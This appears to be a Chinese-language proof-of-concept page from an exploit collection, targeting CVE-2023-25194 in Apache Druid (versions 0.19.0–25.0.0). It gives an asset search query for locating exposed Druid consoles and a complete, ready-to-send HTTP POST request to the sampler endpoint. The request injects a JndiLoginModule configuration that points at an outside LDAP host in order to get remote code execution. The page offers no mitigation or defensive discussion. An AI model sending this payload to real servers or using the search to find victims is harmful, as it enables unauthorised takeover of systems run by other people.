POC/wpoc/Apache/ApacheDruid/ApaceDruid存在远程命令执行漏洞(CVE-2023-25194).md

# Apace Druid存在 远程命令执行漏洞(CVE-2023-25194)

# 一、漏洞简介
<font style="color:rgb(36, 41, 46);">Apache Druid是一个实时分析型数据库，旨在对大型数据集进行快速的查询分析（"OLAP"查询)。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景，同时，Druid也通常被用来助力分析型应用的图形化界面，或者当做需要快速聚合的高并发后端API，Druid最适合应用于面向事件类型的数据。Apace Druid存在 远程命令执行漏洞(CVE-2023-25194)</font>

# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
+ 0.19.0 <= Apache Druid <= 25.0.0

# 三、资产测绘
```java
title="Apache Druid"
```

![1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289.png](./img/XPRtC17bmvqPfx-1/1718117306587-20ca98cb-dc58-4025-8a8b-2a7a2a1ee289-439817.png)

# 四、漏洞复现
```java
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 
Content-Length: 1400
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://vps:8888
Referer: http://vps:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: pZaf_2132_ulastactivity=050484OuqAxDqETcOja26QKgFkE4HbrlSk4NbAkGRg9oNLIbkCUN; pZaf_2132_nofavfid=1; pZaf_2132_smile=1D1; pZaf_2132_home_readfeed=1682214968; pZaf_2132_lastviewtime=1%7C1682215445; pZaf_2132_lastcheckfeed=1%7C1682217817; kOJf_2132_saltkey=MGWItu8r; kOJf_2132_lastvisit=1683339017; kOJf_2132_ulastactivity=27e4qsFumyqDRGo03vcLLEHChJmZRharD1jfbUJnU1NIIIrbB8UL; kOJf_2132_nofavfid=1; kOJf_2132_lastcheckfeed=1%7C1683342726; PHPSESSID=3543e022151ed94117e84216
Connection: close

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"127.0.0.1:6666",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://wuriedscos.dgrh3.cn\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"test",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}
```

![1718119163845-f6728f22-d36c-4d3c-b141-603b89a28b4c.png](./img/XPRtC17bmvqPfx-1/1718119163845-f6728f22-d36c-4d3c-b141-603b89a28b4c-459554.png)



> 更新: 2024-06-17 09:22:47  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bfg6tey47m6g5aaa>